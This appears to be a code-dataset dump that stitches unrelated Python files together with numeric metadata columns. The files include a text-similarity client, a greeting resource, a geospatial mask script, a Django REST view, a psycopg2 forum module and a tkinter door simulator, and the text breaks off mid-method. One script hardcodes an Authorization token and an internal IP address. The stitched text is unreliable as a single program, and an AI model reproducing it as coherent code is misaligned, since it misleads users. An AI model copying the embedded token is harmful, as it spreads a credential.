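A quick illustration of the intended usage (a sketch, not from the repo, under the assumption that FrozenClass rejects new attributes after _freeze()):

state = RunnerState(device='cuda', is_train=True)
state.epoch = 3          # existing attribute: allowed
# state.new_field = 1    # would raise once the instance is frozen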
| 22.777778
| 75
| 0.570732
| 96
| 820
| 4.78125
| 0.5625
| 0.104575
| 0.061002
| 0.095861
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009294
| 0.343902
| 820
| 35
| 76
| 23.428571
| 0.843866
| 0.121951
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047619
| false
| 0
| 0.095238
| 0
| 0.190476
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c991092ab3a5e6ba800ee09dfef81c31b1bd3d3c
| 1,262
|
py
|
Python
|
t2t_bert/pretrain_finetuning/test_green_sample.py
|
yyht/bert
|
480c909e0835a455606e829310ff949c9dd23549
|
[
"Apache-2.0"
] | 34
|
2018-12-19T01:00:57.000Z
|
2021-03-26T09:36:37.000Z
|
t2t_bert/pretrain_finetuning/test_green_sample.py
|
yyht/bert
|
480c909e0835a455606e829310ff949c9dd23549
|
[
"Apache-2.0"
] | 11
|
2018-12-25T03:37:59.000Z
|
2021-08-25T14:43:58.000Z
|
t2t_bert/pretrain_finetuning/test_green_sample.py
|
yyht/bert
|
480c909e0835a455606e829310ff949c9dd23549
|
[
"Apache-2.0"
] | 9
|
2018-12-27T08:00:44.000Z
|
2020-06-08T03:05:14.000Z
|
# -*- coding: utf-8 -*-
import requests
import numpy as np
import json
import concurrent.futures
import codecs

with codecs.open('./test_1.txt', 'r', 'utf-8') as frobj:
    input1 = frobj.read().strip()

with codecs.open('./candidate_1.txt', 'r', 'utf-8') as frobj:
    candidate1 = frobj.read().strip()

# The second pair of files gets distinct names; the original rebound
# input1/candidate1 and silently discarded the first pair.
with codecs.open('./test_2.txt', 'r', 'utf-8') as frobj:
    input2 = frobj.read().strip()

with codecs.open('./candidate_2.txt', 'r', 'utf-8') as frobj:
    candidate2 = frobj.read().strip()

post_data_1 = {
    "data": {
        "query": input1,
        "candidate": [candidate1]
    }
}

def create_http_session(config):
    session = requests.Session()
    a = requests.adapters.HTTPAdapter(max_retries=config.get("max_retries", 3),
                                      pool_connections=config.get("pool_connections", 100),
                                      pool_maxsize=config.get("pool_maxsize", 100))
    session.mount('http://', a)
    return session

session = create_http_session({})

def infer_data(input_data):
    headers = {}
    headers["Authorization"] = "ZWE5Y2FmNTgxMjA2NzdmOTJlOTEyMTllNmFkMTI4MDg4ZDk5OGMzYQ=="
    # Send through the pooled session and pass the headers; the original built
    # both but used neither, and read the undefined name 'input_data'.
    response = session.post("http://11.31.153.212:58756/api/predict/pi_text_similarity_match_v1_bj_90ebb4d6",
                            headers=headers,
                            data=json.dumps(input_data))
    results = response.content
    return results

resp = infer_data(post_data_1)  # the original called the undefined name 'infer'
print(resp)
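The file imports concurrent.futures but never uses it; a sketch (not in the original) of how it could fan out requests over the pooled session:

with concurrent.futures.ThreadPoolExecutor(max_workers=4) as pool:
    futures = [pool.submit(infer_data, post_data_1) for _ in range(4)]
    for fut in concurrent.futures.as_completed(futures):
        print(fut.result())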
| 25.755102
| 107
| 0.698891
| 169
| 1,262
| 5.065089
| 0.420118
| 0.023364
| 0.065421
| 0.037383
| 0.247664
| 0.247664
| 0.231308
| 0.226636
| 0.226636
| 0.226636
| 0
| 0.045662
| 0.13233
| 1,262
| 48
| 108
| 26.291667
| 0.736073
| 0.01664
| 0
| 0.111111
| 0
| 0
| 0.23629
| 0.045161
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0
| 0.138889
| 0
| 0.25
| 0.027778
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c993d47a6ac0a9f61ec7fa06b4e0b59229dbea51
| 527
|
py
|
Python
|
tests/resources/greeting_resoource.py
|
NoeCruzMW/zpy-flask-msc
|
9c2fdcc7e7bdbe3eed4522bfc68afcc00ad5994a
|
[
"MIT"
] | null | null | null |
tests/resources/greeting_resoource.py
|
NoeCruzMW/zpy-flask-msc
|
9c2fdcc7e7bdbe3eed4522bfc68afcc00ad5994a
|
[
"MIT"
] | null | null | null |
tests/resources/greeting_resoource.py
|
NoeCruzMW/zpy-flask-msc
|
9c2fdcc7e7bdbe3eed4522bfc68afcc00ad5994a
|
[
"MIT"
] | null | null | null |
from zpy.api.resource import ZResource, HTTP_METHODS


class GreetingResource(ZResource):
    blocked_methods = [
        HTTP_METHODS.POST,
        HTTP_METHODS.DELETE,
        HTTP_METHODS.PATCH,
        HTTP_METHODS.PUT,
    ]

    def __init__(self, **kwargs) -> None:
        super().__init__()

    def get(self):
        l, i = super().new_operation()
        try:
            return self.success({"greeting": "hello world!"}, logger=l)
        except Exception as e:
            return self.handle_exceptions(e, l, i)
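A direct-call sketch (not in the original; zpy normally routes HTTP traffic to these handlers itself, and ZResource's constructor may require framework context this sketch omits):

resource = GreetingResource()
print(resource.get())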
| 23.954545
| 71
| 0.601518
| 60
| 527
| 5.016667
| 0.65
| 0.182724
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.28463
| 527
| 21
| 72
| 25.095238
| 0.798408
| 0
| 0
| 0
| 0
| 0
| 0.037951
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.0625
| 0
| 0.4375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c998cff8c1a24f25ddb54c9444ec21d5f87c9ecc
| 1,762
|
py
|
Python
|
brainforest/s_create_inputs.py
|
binello7/swisssmartfarming
|
40eef7b1726bc47d320ab12507479d836592138b
|
[
"MIT"
] | 2
|
2020-08-03T10:05:14.000Z
|
2021-03-30T13:18:39.000Z
|
brainforest/s_create_inputs.py
|
binello7/swisssmartfarming
|
40eef7b1726bc47d320ab12507479d836592138b
|
[
"MIT"
] | 6
|
2021-03-19T12:41:16.000Z
|
2021-09-26T21:21:40.000Z
|
brainforest/s_create_inputs.py
|
binello7/swisssmartfarming
|
40eef7b1726bc47d320ab12507479d836592138b
|
[
"MIT"
] | 3
|
2020-05-13T23:57:04.000Z
|
2020-06-18T09:37:17.000Z
|
from data_interface import Dataset, Data_Interface
from utils import functions as ufunc
import geopandas as gpd
import matplotlib.pyplot as plt
import numpy as np
import os
import rasterio as rio
import rasterio.mask as riom
import shapely
from IPython import embed
import sys

sys.path.append('/home/seba/Projects/swisssmartfarming')

rgb_path = ('/media/seba/Samsung_2TB/forest-project/qgis/gubler/rgb/'
            '20200626_flight2_blackfly_rgb_transparent_mosaic_group1.tif')
ms_path = ('/media/seba/Samsung_2TB/forest-project/qgis/gubler/nir/'
           '20200626_flight2_photonfocus_nir_transparent_reflectance_group1.tif')
masks_path = ('/media/seba/Samsung_2TB/forest-project/qgis/gubler/shapes/'
              'trees.shp')
boundary_path = ('/media/seba/Samsung_2TB/forest-project/qgis/gubler/shapes/'
                 'boundary.shp')

dataset = rio.open(rgb_path)
shapefile = gpd.read_file(masks_path)
shapes = shapefile.geometry
# (img_mask, transf_mask) = riom.mask(dataset, shapes)
# img_mask = np.swapaxes(img_mask, 0, 2)
# plt.imshow(img_mask[:,:,0:3])

boundary = gpd.read_file(boundary_path)
tree_masks = gpd.read_file(masks_path)

dataset = Dataset(
    name='gubler',
    date='20200626',
    rgb_path=rgb_path,
    ms_path=ms_path,
    mask_shapefile=tree_masks,
    outer_shapefile=boundary,
    rgb_bands_to_read=[0, 1, 2],
    ms_bands_to_read=None,
)
dataset = [dataset]
di_train = Data_Interface(dataset, {'tree': 1, 'car': 2})

img, msk = di_train.get_pair()
# plt.imshow(msk)

save_path = '/media/seba/Samsung_2TB/forest-project/qgis/gubler/train'
di_train.save(save_path=save_path)

# x1003_path = '/media/seba/Samsung_2TB/forest-project/qgis/gubler/train/masks/x1003_y1009.png'
# x1003 = ufunc.read_img2array(x1003_path)
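A sketch (not in the original) expanding the commented-out riom.mask call above; since the name dataset was rebound to a list, a fresh reader is opened here:

with rio.open(rgb_path) as src:
    img_mask, transf_mask = riom.mask(src, shapes, crop=True)
img_mask = np.swapaxes(img_mask, 0, 2)
plt.imshow(img_mask[:, :, 0:3])
plt.show()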
| 28.885246
| 95
| 0.746311
| 257
| 1,762
| 4.875486
| 0.33463
| 0.043097
| 0.062251
| 0.09577
| 0.269753
| 0.237829
| 0.237829
| 0.237829
| 0.237829
| 0.164405
| 0
| 0.041885
| 0.132804
| 1,762
| 60
| 96
| 29.366667
| 0.778141
| 0.15437
| 0
| 0
| 0
| 0
| 0.32861
| 0.30027
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.275
| 0
| 0.275
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c99a5abd3c9530802736be82134167242a054f72
| 574
|
py
|
Python
|
profiles_api/views.py
|
Vinutha2905/Python_RestAPI
|
4c185d37d32c3b5f00154f4be1b4ad0d2fab6d66
|
[
"MIT"
] | null | null | null |
profiles_api/views.py
|
Vinutha2905/Python_RestAPI
|
4c185d37d32c3b5f00154f4be1b4ad0d2fab6d66
|
[
"MIT"
] | null | null | null |
profiles_api/views.py
|
Vinutha2905/Python_RestAPI
|
4c185d37d32c3b5f00154f4be1b4ad0d2fab6d66
|
[
"MIT"
] | null | null | null |
from rest_framework.views import APIView
from rest_framework.response import Response


class HelloApiView(APIView):
    """TEST API VIEW"""

    def get(self, request, format=None):
        """Returns a list of API features"""
        # Commas were missing between these literals, so Python concatenated
        # all four strings into a single list entry.
        an_apiview = [
            'Uses HTTP methods as function (get,post, put, delete, patch)',
            'Is Similar to a traditional Django View',
            'Gives you the most control over your application logic',
            'Is mapped manually to the URLs',
        ]
        return Response({'message': 'Hello', 'an_apiview': an_apiview})
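For the view to be reachable it still needs URL wiring; a standard DRF hookup sketch (the project module and route names are assumptions, not from this file):

# profiles_project/urls.py (hypothetical)
from django.urls import path
from profiles_api.views import HelloApiView

urlpatterns = [
    path('api/hello-view/', HelloApiView.as_view()),
]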
| 31.888889
| 74
| 0.642857
| 72
| 574
| 5.055556
| 0.736111
| 0.074176
| 0.093407
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.264808
| 574
| 17
| 75
| 33.764706
| 0.862559
| 0.076655
| 0
| 0
| 0
| 0
| 0.39499
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.181818
| 0
| 0.454545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c99e1e3eaa5ae563327d390c5f49ea33d97c4ae8
| 911
|
py
|
Python
|
forumdb.py
|
fatih-iver/Intro-to-Relational-Databases
|
28528132378436d6dd1f1bdec96d1e7e285b4e4d
|
[
"MIT"
] | null | null | null |
forumdb.py
|
fatih-iver/Intro-to-Relational-Databases
|
28528132378436d6dd1f1bdec96d1e7e285b4e4d
|
[
"MIT"
] | null | null | null |
forumdb.py
|
fatih-iver/Intro-to-Relational-Databases
|
28528132378436d6dd1f1bdec96d1e7e285b4e4d
|
[
"MIT"
] | null | null | null |
# "Database code" for the DB Forum.
import psycopg2
import bleach
DNAME = "forum"
#POSTS = [("This is the first post.", datetime.datetime.now())]
def get_posts():
"""Return all posts from the 'database', most recent first."""
db = psycopg2.connect(database=DNAME)
c = db.cursor()
c.execute("select content, time from posts order by time desc")
rows = c.fetchall()
db.close()
return rows
#def get_posts():
#"""Return all posts from the 'database', most recent first."""
#return reversed(POSTS)
def add_post(content):
"""Add a post to the 'database' with the current timestamp."""
db = psycopg2.connect(database=DNAME)
c = db.cursor()
c.execute("INSERT INTO posts values (%s) ", (bleach.clean(content),))
db.commit()
db.close()
#def add_post(content):
#"""Add a post to the 'database' with the current timestamp."""
#POSTS.append((content, datetime.datetime.now()))
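A usage sketch (not in the original file); it assumes a local PostgreSQL server with a 'forum' database and a 'posts' table:

add_post("Hello, forum!")
for content, time in get_posts():
    print(time, content)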
| 24.621622
| 71
| 0.675082
| 130
| 911
| 4.7
| 0.392308
| 0.072013
| 0.062193
| 0.055646
| 0.533552
| 0.533552
| 0.533552
| 0.533552
| 0.533552
| 0.533552
| 0
| 0.003968
| 0.170143
| 911
| 36
| 72
| 25.305556
| 0.804233
| 0.485181
| 0
| 0.375
| 0
| 0
| 0.18931
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.125
| 0
| 0.3125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9a08b6c821aa60ac0ac2219e490a38ed9d96387
| 19,553
|
py
|
Python
|
src/apps/Door.py
|
sdunlap-afit/hilics
|
ae06113365817e4240fe894d3dfd784991c78102
|
[
"Apache-2.0"
] | 2
|
2019-09-27T15:45:46.000Z
|
2021-07-28T15:02:21.000Z
|
src/apps/Door.py
|
sdunlap-afit/hilics
|
ae06113365817e4240fe894d3dfd784991c78102
|
[
"Apache-2.0"
] | 3
|
2020-09-25T13:40:56.000Z
|
2020-11-03T20:38:32.000Z
|
src/apps/Door.py
|
sdunlap-afit/hilics
|
ae06113365817e4240fe894d3dfd784991c78102
|
[
"Apache-2.0"
] | 2
|
2020-05-29T16:58:55.000Z
|
2021-04-27T23:52:17.000Z
|
#!/usr/bin/env python3
#
# IP: HILICS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
import Tkinter as tk
    from tkFont import Font  # Python 2 ships the font module as tkFont, not Tkinter.font
except ImportError:
import tkinter as tk
from tkinter.font import Font
from PIL import Image, ImageTk
import threading
import time
from sims.DoorSim import DoorSim
from widgets.AlarmCircle import AlarmCircle
class Door(tk.Frame):
def __init__(self, master=None, default_bg=None, default_fg=None, width=800, height=480):
self.master = master
super().__init__(master)
self.default_bg = default_bg
self.default_fg = default_fg
self.high_color = '#EC7600'
self.low_color = '#678CB1'
self.alarm_color = '#C00000'
self.door_color = '#152020'
self.green_color = '#93C763'
self.default_width = width
self.default_height = height
self.door_pos = 0
self.panels = []
self.doorsim = DoorSim()
self.pack()
self.create_widgets()
self.running = True
self.thread = threading.Thread(target=self.worker_thread)
self.thread.setDaemon(True)
self.thread.start()
self.thread2 = threading.Thread(target=self.sim_thread)
self.thread2.setDaemon(True)
self.thread2.start()
def clean_up(self):
self.running = False
self.thread.join(1.0)
self.thread2.join(1.0)
self.doorsim.close()
self.master.destroy()
def config_bg(self, wid):
if not self.default_bg is None:
wid['bg'] = self.default_bg
def config_fg(self, wid):
if not self.default_fg is None:
wid['fg'] = self.default_fg
def config_frame(self, frame):
frame['borderwidth'] = 1
frame['relief'] = tk.RIDGE
frame.pack_propagate(0)
frame.grid_propagate(0)
self.config_bg(frame)
def config_btn(self, btn):
btn['font'] = Font(root=self.master, family='Helvetica', size=18)
btn['width'] = 8
btn['height'] = 2
btn['activebackground'] = self.default_bg
btn['activeforeground'] = self.default_fg
btn['bd'] = 0
btn['highlightthickness'] = 1
btn['relief'] = 'ridge'
self.config_bg(btn)
self.config_fg(btn)
def config_label(self, lab):
self.config_bg(lab)
self.config_fg(lab)
def sim_thread(self):
while self.running:
try:
self.doorsim.update()
time.sleep(0.01)
except Exception as e:
print(e)
def worker_thread(self):
while self.running:
try:
self.update_buttons()
self.update_indicators()
self.update_motor()
self.update_alarms()
self.update_door(int(self.doorsim.doorpos))
self.update_switches()
time.sleep(0.01)
except Exception as e:
print(e)
def update_alarms(self):
self.top_crash_alarm.update(self.doorsim.top_alarm)
self.btm_crash_alarm.update(self.doorsim.btm_alarm)
self.motor_alarm.update(self.doorsim.motor_alarm)
def update_switches(self):
if self.doorsim.open_switch:
self.canvas.itemconfig(self.open_switch, fill=self.high_color, outline=self.high_color)
else:
self.canvas.itemconfig(self.open_switch, fill=self.low_color , outline=self.low_color )
if self.doorsim.closed_switch:
self.canvas.itemconfig(self.close_switch, fill=self.high_color, outline=self.high_color)
else:
self.canvas.itemconfig(self.close_switch, fill=self.low_color , outline=self.low_color)
if self.doorsim.prox_switch:
self.canvas.itemconfig(self.prox_switch, fill=self.high_color, outline=self.high_color)
self.canvas.itemconfig(self.car, state='normal')
else:
self.canvas.itemconfig(self.prox_switch, fill=self.low_color , outline=self.low_color)
self.canvas.itemconfig(self.car, state='hidden')
if self.doorsim.impact_switch:
self.canvas.itemconfig(self.impact_switch, fill=self.high_color, outline=self.high_color)
self.canvas.itemconfig(self.explosion, state='normal')
else:
self.canvas.itemconfig(self.impact_switch, fill=self.low_color , outline=self.low_color)
self.canvas.itemconfig(self.explosion, state='hidden')
def update_motor(self):
if self.doorsim.motor_up:
self.canvas.itemconfig(self.motor_up, fill=self.high_color, outline=self.high_color)
else:
self.canvas.itemconfig(self.motor_up, fill=self.low_color , outline=self.low_color )
if self.doorsim.motor_down:
self.canvas.itemconfig(self.motor_down, fill=self.high_color, outline=self.high_color)
else:
self.canvas.itemconfig(self.motor_down, fill=self.low_color , outline=self.low_color )
def update_buttons(self):
if self.doorsim.open_btn:
self.canvas.itemconfig(self.open_btn, fill=self.high_color, outline=self.high_color)
else:
self.canvas.itemconfig(self.open_btn, fill=self.low_color , outline=self.low_color )
if self.doorsim.close_btn:
self.canvas.itemconfig(self.close_btn, fill=self.high_color, outline=self.high_color)
else:
self.canvas.itemconfig(self.close_btn, fill=self.low_color , outline=self.low_color )
if self.doorsim.stop_btn:
self.canvas.itemconfig(self.stop_btn, fill=self.high_color, outline=self.high_color)
else:
self.canvas.itemconfig(self.stop_btn, fill=self.low_color , outline=self.low_color )
def update_indicators(self):
if self.doorsim.open_ind:
self.canvas.itemconfig(self.open_ind, fill=self.high_color, outline=self.high_color)
else:
self.canvas.itemconfig(self.open_ind, fill=self.low_color , outline=self.low_color )
if self.doorsim.closed_ind:
self.canvas.itemconfig(self.closed_ind, fill=self.high_color, outline=self.high_color)
else:
self.canvas.itemconfig(self.closed_ind, fill=self.low_color , outline=self.low_color )
if self.doorsim.ajar_ind:
self.canvas.itemconfig(self.ajar_ind, fill=self.high_color, outline=self.high_color)
else:
self.canvas.itemconfig(self.ajar_ind, fill=self.low_color , outline=self.low_color )
def update_door(self, pos):
# Dead zone at top of door (stops from opening completely)
#if pos < 10:
# pos = 10
if not self.door_pos == pos:
self.door_pos = pos # 0 - 100
panel_height = 75 # pixels
pos = int(pos * 0.9) + 10.0
coords = self.canvas.coords(self.door_rect)
startx = coords[0] + 2
starty = coords[1] + 2
endx = coords[2] - 2
endy = coords[3] - 2
if len(self.panels) < 1:
self.canvas.tag_raise(self.car)
num_panels = 1 + int((endy - starty) / panel_height)
for __ in range(0, num_panels):
p = self.canvas.create_rectangle(0, 0, 1, 1, outline=self.door_color, fill=self.door_color, state='hidden')
self.panels.append(p)
self.canvas.tag_raise(self.explosion)
#print(self.panels)
next_panel_endy = starty + int(((endy - starty) * pos) / 100)
for p in self.panels:
if next_panel_endy < starty:
self.canvas.itemconfig(p, state='hidden')
else:
sy = next_panel_endy - panel_height
ey = next_panel_endy
next_panel_endy = sy - 2
if sy < starty:
sy = starty
self.canvas.coords(p, startx, sy, endx, ey)
self.canvas.itemconfig(p, state='normal')
#self.canvas.pack()
def open_btn_click(self, event):
self.doorsim.open_btn = not self.doorsim.open_btn
def close_btn_click(self, event):
self.doorsim.close_btn = not self.doorsim.close_btn
def stop_btn_click(self, event):
self.doorsim.stop_btn = not self.doorsim.stop_btn
def round_rectangle(self, canvas, x1, y1, x2, y2, radius=25, **kwargs):
points = [x1+radius, y1,
x1+radius, y1,
x2-radius, y1,
x2-radius, y1,
x2, y1,
x2, y1+radius,
x2, y1+radius,
x2, y2-radius,
x2, y2-radius,
x2, y2,
x2-radius, y2,
x2-radius, y2,
x1+radius, y2,
x1+radius, y2,
x1, y2,
x1, y2-radius,
x1, y2-radius,
x1, y1+radius,
x1, y1+radius,
x1, y1]
        return canvas.create_polygon(points, smooth=True, **kwargs)  # kwargs must be unpacked, not passed positionally
def setup_frame1(self):
frame = tk.Frame(self, width=800, height=400)
self.config_frame(frame)
frame.grid(row = 0, column=0, columnspan=1, rowspan=1)
# lab = tk.Label(frame, text='Door', font=("Helvetica", 16))
# self.config_label(lab)
# lab.grid(column=1, row=0, columnspan=1, pady=10)
# frame.grid_columnconfigure(0, weight=1)
# frame.grid_columnconfigure(2, weight=1)
self.canvas = tk.Canvas(frame, width=800, height=400, bd=0, highlightthickness=0, relief='ridge')
self.config_bg(self.canvas)
########## Door Frame ##########
width = 300
height = 300
sx = (800 - width) / 2
sy = (400 - height) / 2
ex = sx + width
ey = sy + height
coords = [sx, sy, ex, ey]
self.door_rect = self.canvas.create_rectangle(coords[0], coords[1], coords[2], coords[3], outline=self.default_fg, fill=self.default_fg)
font = 'Helvetica 16 bold'
r = 15
self.btm_crash_alarm = AlarmCircle(self.canvas, sx + 100, ey + 25, r, self.alarm_color, self.default_bg, 'CRASH!', font)
self.top_crash_alarm = AlarmCircle(self.canvas, sx + 100, sy - 25, r, self.alarm_color, self.default_bg, 'CRASH!', font)
x = sx + (ex - sx) / 2
y = ey - 10
img = Image.open('images/explosion.png')
img.thumbnail((250, 250), Image.ANTIALIAS)
self.explosion_img_junk = ImageTk.PhotoImage(img)
self.explosion = self.canvas.create_image(x, y, anchor='s', image=self.explosion_img_junk)
img = Image.open('images/Car1.png')
img.thumbnail((250, 250), Image.ANTIALIAS)
self.car_img_junk = ImageTk.PhotoImage(img)
self.car = self.canvas.create_image(x, y, anchor='s', image=self.car_img_junk)
########## Limit Switches ##########
sx = coords[0] - 30
sy = coords[1] + 20
ex = sx + 20
ey = sy + 20
self.open_switch = self.canvas.create_rectangle(sx, sy, ex, ey, outline=self.default_fg, fill=self.low_color)
self.canvas.create_text(sx+10, sy-8, anchor='c', text = 'I:0/0', fill=self.default_fg)
self.canvas.create_text(sx-5, sy+10, anchor='e', text = 'Limit', font=("Helvetica", 10), fill=self.default_fg)
sx = coords[0] - 30
sy = coords[3] - 40
ex = sx + 20
ey = sy + 20
self.close_switch = self.canvas.create_rectangle(sx, sy, ex, ey, outline=self.default_fg, fill=self.low_color)
self.canvas.create_text(sx+10, sy-8, anchor='c', text = 'I:0/1', fill=self.default_fg)
self.canvas.create_text(sx-5, sy+10, anchor='e', text = 'Limit', font=("Helvetica", 10), fill=self.default_fg)
sx = coords[2] + 10
sy = coords[3] - (height / 2) - 10
ex = sx + 20
ey = sy + 20
self.impact_switch = self.canvas.create_rectangle(sx, sy, ex, ey, outline=self.low_color, fill=self.low_color)
self.canvas.create_text(sx+10, sy-8, anchor='c', text = 'I:0/6', fill=self.default_fg)
self.canvas.create_text(ex+5, sy+10, anchor='w', text = 'Impact', font=("Helvetica", 10), fill=self.default_fg)
sx = coords[2] + 10
sy = coords[3] - 40
ex = sx + 20
ey = sy + 20
self.prox_switch = self.canvas.create_rectangle(sx, sy, ex, ey, outline=self.low_color, fill=self.low_color)
self.canvas.create_text(sx+10, sy-8, anchor='c', text = 'I:0/5', fill=self.default_fg)
self.canvas.create_text(ex+5, sy+10, anchor='w', text = 'Proximity', font=("Helvetica", 10), fill=self.default_fg)
########## Motor Indicators ##########
sx = coords[2] + 75
sy = coords[1] + 10
ex = sx + 50
ey = sy + 40
self.motor_up = self.canvas.create_rectangle(sx, sy, ex, ey, outline=self.default_fg, fill=self.low_color)
self.motor_alarm = AlarmCircle(self.canvas, sx, ey + 25, r, self.alarm_color, self.default_bg, 'ALARM!', font)
m = sx + (ex - sx) / 2
offset = 9
self.canvas.create_line(sx+offset, ey-offset, m, sy+offset, fill=self.default_bg, width=5)
self.canvas.create_line(m, sy+offset, ex-offset, ey-offset, fill=self.default_bg, width=5)
self.canvas.create_text(sx-5, sy+20, anchor='e', text = 'O:0/0', fill=self.default_fg)
sx = sx + 52
ex = sx + 50
ey = sy + 40
self.motor_down = self.canvas.create_rectangle(sx, sy, ex, ey, outline=self.default_fg, fill=self.low_color)
m = sx + (ex - sx) / 2
self.canvas.create_line(sx+offset, sy+offset, m, ey-offset, fill=self.default_bg, width=5)
self.canvas.create_line(m, ey-offset, ex-offset, sy+offset, fill=self.default_bg, width=5)
self.canvas.create_text(ex+5, sy+20, anchor='w', text = 'O:0/1', fill=self.default_fg)
self.canvas.create_text(sx-1, sy-15, anchor='c', text = 'Motor', font=("Helvetica", 14), fill=self.default_fg)
########## Button Panel ##########
ht = 200
wd = 125
sx = 10
sy = 380 - ht
ex = sx + wd
ey = sy + ht
#rect = self.canvas.create_rectangle(sx, sy, ex, ey, outline=self.default_fg, fill=self.default_fg)
self.round_rectangle(self.canvas, sx, sy, ex, ey, radius=50, outline=self.default_fg, fill=self.default_fg)
x = sx + ((ex - sx) / 2)
y = sy + 20
self.canvas.create_text(x, y, anchor='c', text = 'Buttons', font=("Helvetica", 14), fill=self.default_bg)
r = 20
x = sx + ((ex - sx) / 2)
y = sy + 15 + (1 * (ey - sy) / 4)
self.open_btn = self.round_rectangle(self.canvas, x-r, y-r, x+r, y+r, radius=20, outline=self.default_fg, fill=self.low_color)
#self.open_btn = self.canvas.create_oval(x-r, y-r, x+r, y+r, outline=self.default_fg, fill=self.low_color)
self.canvas.tag_bind(self.open_btn, '<Button-1>', self.open_btn_click)
self.canvas.create_text(x - r - 2, y, anchor='e', text = 'I:0/2', fill=self.default_bg)
self.canvas.create_text(x + r + 2, y, anchor='w', text = 'OPEN', fill=self.default_bg)
x = sx + ((ex - sx) / 2)
y = sy + 15 + (2 * (ey - sy) / 4)
self.close_btn = self.round_rectangle(self.canvas, x-r, y-r, x+r, y+r, radius=20, outline=self.default_fg, fill=self.low_color)
self.canvas.tag_bind(self.close_btn, '<Button-1>', self.close_btn_click)
self.canvas.create_text(x - r - 2, y, anchor='e', text = 'I:0/3', fill=self.default_bg)
self.canvas.create_text(x + r + 2, y, anchor='w', text = 'CLOSE', fill=self.default_bg)
x = sx + ((ex - sx) / 2)
y = sy + 15 + (3 * (ey - sy) / 4)
self.stop_btn = self.round_rectangle(self.canvas, x-r, y-r, x+r, y+r, radius=20, outline=self.default_fg, fill=self.low_color)
self.canvas.tag_bind(self.stop_btn, '<Button-1>', self.stop_btn_click)
self.canvas.create_text(x - r - 2, y, anchor='e', text = 'I:0/4', fill=self.default_bg)
self.canvas.create_text(x + r + 2, y, anchor='w', text = 'STOP', fill=self.default_bg)
########## Car Button ##########
w = 65
h = 40
x = (sx + ((ex - sx) / 2)) - w/2
y = sy - h - h
rect = self.round_rectangle(self.canvas, x, y, x+w, y+h, radius=20, outline=self.green_color, fill=self.green_color)
lab = self.canvas.create_text(x + w/2, y+h/2, anchor='c', text = 'Car', fill=self.default_bg, font='Helvetica 12 bold')
self.canvas.tag_bind(rect, '<Button-1>', self.doorsim.begin_car)
self.canvas.tag_bind(lab, '<Button-1>', self.doorsim.begin_car)
########## Indicator Panel ##########
ht = 200
wd = 125
sx = 790 - wd
sy = 380 - ht
ex = sx + wd
ey = sy + ht
#rect = self.canvas.create_rectangle(sx, sy, ex, ey, outline=self.default_fg, fill=self.default_fg)
self.round_rectangle(self.canvas, sx, sy, ex, ey, radius=50, outline=self.default_fg, fill=self.default_fg)
x = sx + ((ex - sx) / 2)
y = sy + 20
self.canvas.create_text(x, y, anchor='c', text = 'Indicators', font=("Helvetica", 14), fill=self.default_bg)
r = 20
x = sx + ((ex - sx) / 2)
y = sy + 15 + (1 * (ey - sy) / 4)
self.open_ind = self.canvas.create_oval(x-r, y-r, x+r, y+r, outline=self.default_fg, fill=self.low_color)
self.canvas.create_text(x - r - 2, y, anchor='e', text = 'O:0/2', fill=self.default_bg)
self.canvas.create_text(x + r + 2, y, anchor='w', text = 'OPEN', fill=self.default_bg)
x = sx + ((ex - sx) / 2)
y = sy + 15 + (2 * (ey - sy) / 4)
self.closed_ind = self.canvas.create_oval(x-r, y-r, x+r, y+r, outline=self.default_fg, fill=self.low_color)
